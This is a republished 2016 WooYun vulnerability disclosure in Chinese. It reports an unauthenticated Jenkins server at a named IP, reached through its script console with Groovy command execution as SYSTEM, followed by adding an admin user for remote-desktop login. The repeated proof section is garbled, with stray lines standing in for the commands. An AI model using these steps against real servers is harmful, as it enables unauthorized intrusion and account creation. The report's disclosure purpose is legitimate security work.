京东某系统未授权访问(项目源码泄露)导致命令执行/成功登录终端

admin 2017年4月25日23:33:29评论293 views字数 235阅读0分47秒阅读模式
摘要

2016-03-04: 细节已通知厂商并且等待厂商处理中
2016-03-07: 厂商已经确认,细节仅向厂商公开
2016-03-17: 细节向核心白帽子及相关领域专家公开
2016-03-27: 细节向普通白帽子公开
2016-04-06: 细节向实习白帽子公开
2016-04-21: 细节向公众公开

漏洞概要 关注数(19) 关注此漏洞

缺陷编号: WooYun-2016-180982

漏洞标题: 京东某系统未授权访问(项目源码泄露)导致命令执行/成功登录终端

相关厂商: 京东商城

漏洞作者: 路人甲

提交时间: 2016-03-04 23:02

公开时间: 2016-04-21 15:03

漏洞类型: 未授权访问/权限绕过

危害等级: 高

自评Rank: 20

漏洞状态: 厂商已经确认

漏洞来源:www.wooyun.org ,如有疑问或需要帮助请联系

Tags标签: 远程命令执行 敏感接口缺乏认证 未授权访问

4人收藏


漏洞详情

披露状态:

2016-03-04: 细节已通知厂商并且等待厂商处理中
2016-03-07: 厂商已经确认,细节仅向厂商公开
2016-03-17: 细节向核心白帽子及相关领域专家公开
2016-03-27: 细节向普通白帽子公开
2016-04-06: 细节向实习白帽子公开
2016-04-21: 细节向公众公开

简要描述:

rt

详细说明:

code 区域
http://211.149.168.153/

先证明这个ip是京东的

code 区域
type c://Users//Administrator//Desktop//Web.config

*.360buy.com

京东某系统未授权访问(项目源码泄露)导致命令执行/成功登录终端

漏洞地址

jenkins 未授权访问

code 区域
http://211.149.168.153:8080/

京东某系统未授权访问(项目源码泄露)导致命令执行/成功登录终端

CRM项目源码

京东某系统未授权访问(项目源码泄露)导致命令执行/成功登录终端

code 区域
http://211.149.168.153:8080/job/CRM/ws/%E7%89%88%E6%9C%AC%E4%BF%AE%E8%AE%A2%E6%97%A5%E5%BF%97/20150408/FBP%E7%AD%BE%E6%94%B6%E5%88%97%E8%A1%A8.txt

京东某系统未授权访问(项目源码泄露)导致命令执行/成功登录终端

命令执行

code 区域
http://211.149.168.153:8080/script

nt authority/system 权限

京东某系统未授权访问(项目源码泄露)导致命令执行/成功登录终端

code 区域
println "netstat -ano".execute().text
println "tasklist /svc".execute().text

找到3389

京东某系统未授权访问(项目源码泄露)导致命令执行/成功登录终端

加用户 加管理组

成功登录终端

京东某系统未授权访问(项目源码泄露)导致命令执行/成功登录终端

来一个不带乱码的

京东某系统未授权访问(项目源码泄露)导致命令执行/成功登录终端

内网环境

京东某系统未授权访问(项目源码泄露)导致命令执行/成功登录终端

测试账户已经删除

京东某系统未授权访问(项目源码泄露)导致命令执行/成功登录终端

漏洞证明:

code 区域
http://211.149.168.153/

先证明这个ip是京东的

code 区域
type c://Users//Administrator//Desktop//Web.config

*.360buy.com

京东某系统未授权访问(项目源码泄露)导致命令执行/成功登录终端

漏洞地址

jenkins 未授权访问

code 区域
http://211.149.168.153:8080/

京东某系统未授权访问(项目源码泄露)导致命令执行/成功登录终端

CRM项目源码

京东某系统未授权访问(项目源码泄露)导致命令执行/成功登录终端

code 区域
http://211.149.168.153:8080/job/CRM/ws/%E7%89%88%E6%9C%AC%E4%BF%AE%E8%AE%A2%E6%97%A5%E5%BF%97/20150408/FBP%E7%AD%BE%E6%94%B6%E5%88%97%E8%A1%A8.txt

京东某系统未授权访问(项目源码泄露)导致命令执行/成功登录终端

命令执行

code 区域
type c://Users//Administrator//Desktop//Web.config

0

nt authority/system 权限

京东某系统未授权访问(项目源码泄露)导致命令执行/成功登录终端

code 区域
type c://Users//Administrator//Desktop//Web.config

1

找到3389

京东某系统未授权访问(项目源码泄露)导致命令执行/成功登录终端

加用户 加管理组

成功登录终端

京东某系统未授权访问(项目源码泄露)导致命令执行/成功登录终端

来一个不带乱码的

京东某系统未授权访问(项目源码泄露)导致命令执行/成功登录终端

内网环境

京东某系统未授权访问(项目源码泄露)导致命令执行/成功登录终端

测试账户已经删除

修复方案:

不安全的Jenkins允许网络上的任何人以你的身份访问程序。考虑至少启用身份验证来阻止滥用。

版权声明:转载请注明来源 路人甲@乌云


漏洞回应

厂商回应:

危害等级:中

漏洞Rank:8

确认时间:2016-03-07 15:03

厂商回复:

经确认非JD服务器,因涉及第三方商家信息,故评中风险。非常感谢您对京东安全的关注~

最新状态:

暂无


漏洞评价:

对本漏洞信息进行评价,以更好的反馈信息的价值,包括信息客观性,内容是否完整以及是否具备学习价值

漏洞评价(共0人评价):

登陆后才能进行评分


评价

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin